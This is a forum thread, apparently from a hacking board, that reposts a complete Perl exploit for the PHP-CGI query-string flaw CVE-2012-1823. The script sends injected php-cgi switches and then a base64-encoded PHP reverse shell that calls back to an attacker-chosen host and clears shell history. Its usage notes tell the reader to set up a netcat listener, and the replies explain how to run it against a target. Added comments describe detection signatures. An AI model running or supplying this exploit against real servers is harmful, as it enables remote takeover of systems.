

PHP + Apache remote code execution exploit



04-30-2014, 08:47 PM #1
BlackB0x3r Offline Junior Member **
#!/usr/bin/perl
#
# Title: PHP + Apache remote code execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 29 October 2013
# Published: 3 November 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Exploit code description:
#
# Quick and dirty perl code to exploit CVE-2012-1823
# Based on Apache Magica by Kingcope. For the sake of fun
# and cross-platforms. Doesn't support SSL.
#
# Exploit usage:
#
# fire-up netcat to listen locally (nc -lvp port) for connect back shell
# or wget http://www.morxploit.com/morxtools/netcat.pl
# perl netcat.pl -l -p port
# perl morxphpache.pl target:port yourhost:port
# If successfully exploited then you should get a connect back shell from the
# target, otherwise you are fuarked =)

use strict;
use IO::Socket;

# Argument check: print the usage banner and exit unless both positional
# arguments were supplied.
# NOTE(review): defined() is applied to the *result* of `$ARGV[0] && $ARGV[1]`,
# not to each element; a falsy first argument ("0" or "") short-circuits the
# && and passes this check even when the second argument is missing.
if(!defined($ARGV[0] && $ARGV[1])) {

# `clear` is run with a fixed argument (no interpolated input); its exit
# status is ignored.
system ('clear');
print "\n";
print "===================================================\n";
print "--- PHP + Apache remote code execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";

print "--- Usage: perl $0 target:port local:port\n";
print "--- Ex: perl $0 192.168.1.115:80 192.168.1.102:1337\n\n";
exit; }

# Positional arguments: "target:port" (the web server) and "local:port" (the
# address the PHP payload connects back to). split() does no validation: an
# argument without ':' leaves the port half undef, and nothing checks that the
# port is numeric or that the host resolves.
my $target = $ARGV[0];
my ($host, $port)= split(':',$target);

my $reverse = $ARGV[1];
my ($connectback, $connectbackport)= split(':',$reverse);

##### Change as needed #####
# Request path of the php-cgi binary. CVE-2012-1823 applies only to PHP served
# through CGI at a path like this one.
my $path = "/cgi-bin/php";
##################################

# Banner, printed again once the arguments have been accepted. As above, the
# `clear` call has a fixed argument and its exit status is ignored.
system ('clear');
print "\n";
print "===================================================\n";
print "--- PHP + Apache remote code execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";


print "[*] Trying to MorXploit $target\n";

# CVE-2012-1823: when a query string contains no '=', the CGI "indexed query"
# rule makes Apache pass it to php-cgi as command-line arguments. $xploit is
# the URL-encoded switch list (`-d directive=value ... -n`) that relaxes the
# ini settings and, through `auto_prepend_file=php://input`, makes PHP execute
# the POST body. For detection: `-d` (`%2D%64`) sequences in a query string
# addressed to a php-cgi path, with no '=' present, are the signature of this
# vector; patched PHP builds ignore such switches.
my $xploit = "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E";
# Raw HTTP/1.1 request line and headers, assembled by hand. The User-Agent is a
# fixed tool-specific string, which makes the request trivially fingerprintable
# in access logs.
my $post = "POST $path?$xploit HTTP/1.1";
my $agent = "User-Agent: MorXploit";
my $accept = "Accept: */*";
my $hostname = "Host: $host";
my $connection = "Connection: Close";
my $ct = "Content-Type: application/x-www-form-urlencoded";

# PHP reverse-shell source held in a Perl double-quoted string: every `\$`
# becomes a literal PHP `$`, while $connectback and $connectbackport are
# interpolated from the second command-line argument. The PHP code forks into
# the background when pcntl is available, opens a TCP connection to that
# address, starts `/bin/sh -i` through proc_open() and relays bytes between the
# socket and the shell's pipes with stream_select(). The `unset HISTFILE`
# prefix in $shell is an anti-forensics step: it suppresses the shell's
# command history.
my $phpshell = "set_time_limit(0);
\$ip = \"$connectback\";
\$port = \"$connectbackport\";
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
    \$pid = pcntl_fork();    
    if (\$pid == -1) {
        printit(\"ERROR: Can't fork\");
        exit(1);
    }
    if (\$pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        printit(\"Error: Can't setsid()\");
        exit(1);
    }
    \$daemon = 1;
} else {
    printit(\"WARNING: Failed to daemonise.\");
}
chdir(\"/\");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
    printit(\"\$errstr (\$errno)\");
    exit(1);
}
\$descriptorspec = array(
   0 => array(\"pipe\", \"r\"),
   1 => array(\"pipe\", \"w\"),
   2 => array(\"pipe\", \"w\")
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
    printit(\"ERROR: Can't spawn shell\");
    exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
while (1) {
    if (feof(\$sock)) {
        printit(\"ERROR: Shell connection terminated\");
        break;
    }
    if (feof(\$pipes[1])) {
        printit(\"ERROR: Shell process terminated\");
        break;
    }
    \$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
    if (in_array(\$sock, \$read_a)) {
        if (\$debug) printit(\"SOCK READ\");
        \$input = fread(\$sock, \$chunk_size);
        if (\$debug) printit(\"SOCK: \$input\");
        fwrite(\$pipes[0], \$input);
    }
    if (in_array(\$pipes[1], \$read_a)) {
        if (\$debug) printit(\"STDOUT READ\");
        \$input = fread(\$pipes[1], \$chunk_size);
        if (\$debug) printit(\"STDOUT: \$input\");
        fwrite(\$sock, \$input);
    }
    if (in_array(\$pipes[2], \$read_a)) {
        if (\$debug) printit(\"STDERR READ\");
        \$input = fread(\$pipes[2], \$chunk_size);
        if (\$debug) printit(\"STDERR: \$input\");
        fwrite(\$sock, \$input);
    }
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
    if (!\$daemon) {
        print \"\$string
\";
    }
}
exit(1);";

# The PHP source is base64-encoded and wrapped in eval(base64_decode(...)).
# EncodeBase64() (defined below) inserts a newline every 72 characters; a
# single-quoted PHP string may contain literal newlines and base64_decode()
# in non-strict mode discards them. For detection: a POST body of the form
# `<?php eval(base64_decode('...'))` to a php-cgi path is itself a strong
# indicator.
my $enc = EncodeBase64($phpshell);
my $evalenc = "<?php eval(base64_decode('$enc')); ?>";

# Content-Length is computed with length(), i.e. in characters; the body is
# pure ASCII so this equals its byte length. The extra "\n" written after the
# body when the request is sent is not counted here.
my $cl = length($evalenc);
my $content = "Content-Length: $cl";

# Base64-encode a byte string without MIME::Base64.
#
# Strategy: pack 'u' uuencodes up to 45 input bytes per line, producing a
# length byte, the encoded text and a newline. The length byte and newline are
# stripped, the uuencode alphabet is remapped to the base64 alphabet with tr,
# the last one or two characters are replaced by '=' padding as needed, and
# the result is broken into lines of at most 72 characters, each terminated by
# "\n" (so a non-empty result always ends with a newline). The empty string
# encodes to the empty string.
#
# Takes one argument (the raw string); returns the encoded string.
sub EncodeBase64
{
    my $plain   = shift;
    my $encoded = '';

    for my $chunk ( $plain =~ /(.{1,45})/gs ) {
        my $uu = substr( pack( 'u', $chunk ), 1 );    # drop the length byte
        chop $uu;                                     # drop the trailing "\n"
        $encoded .= $uu;
    }

    # Remap uuencode characters (` and space..underscore) onto base64's
    # alphabet. This must happen before '=' padding is written, because '='
    # itself lies inside the space..underscore range.
    $encoded =~ tr|` -_|AA-Za-z0-9+/|;

    my $pad = ( 3 - length($plain) % 3 ) % 3;
    if ($pad) {
        substr( $encoded, -$pad, $pad, '=' x $pad );
    }

    # Wrap at 72 characters; every line, including the last, gets a "\n".
    $encoded =~ s/(.{1,72})/$1\n/g;

    return $encoded;
}

# Open a plain TCP connection (no TLS, as the header notes) and write the
# request. Indirect-object syntax (`new Class(...)`) is used; `die` on the same
# line covers connection failure. $host and $port come straight from argv
# without validation (see the split() above).
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "$port",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;

# Lines are terminated with bare "\n" rather than the CRLF HTTP requires;
# Apache has historically tolerated LF-only requests. None of these prints
# are checked, and no response is ever read, so the message below only means
# the bytes were written, not that anything executed: the connect-back
# listener is the sole success indicator. The final "\n" after the body is
# not included in the Content-Length sent above.
print $sock "$post\n";
print $sock "$agent\n";
print $sock "$accept\n";
print $sock "$hostname\n";
print $sock "$connection\n";
print $sock "$ct\n";
print $sock "$content\n\n";
print $sock "$evalenc\n";

print "[*] Exploit sent! Check netcat.\n";
$sock->close();
exit;

05-01-2014, 01:33 AM #2
exploit Offline Junior Member **
How do I use this?

08-18-2014, 06:08 AM #3
T3N38R15 Offline ? lawless-coder *****
To use it you just need to call it from the console and listen with netcat Smiley1
perl morxphpache.pl yourtarget:port netcatip:port
so easy Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

08-23-2014, 01:29 PM #4
PhpFreak Offline Junior Member **
Nice! Going to check this. Biggrinsmiley Thanks.







